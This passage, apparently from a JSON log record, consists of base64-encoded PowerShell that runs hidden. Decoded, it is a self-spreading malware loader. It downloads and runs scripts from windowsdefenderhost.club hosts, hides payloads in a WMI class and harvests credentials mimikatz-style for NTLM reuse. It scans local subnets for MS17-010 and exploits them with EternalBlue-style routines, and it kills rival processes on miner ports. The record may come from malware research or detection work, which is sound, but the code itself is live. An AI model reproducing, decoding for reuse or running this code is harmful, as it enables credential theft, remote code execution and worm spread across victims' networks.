HIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0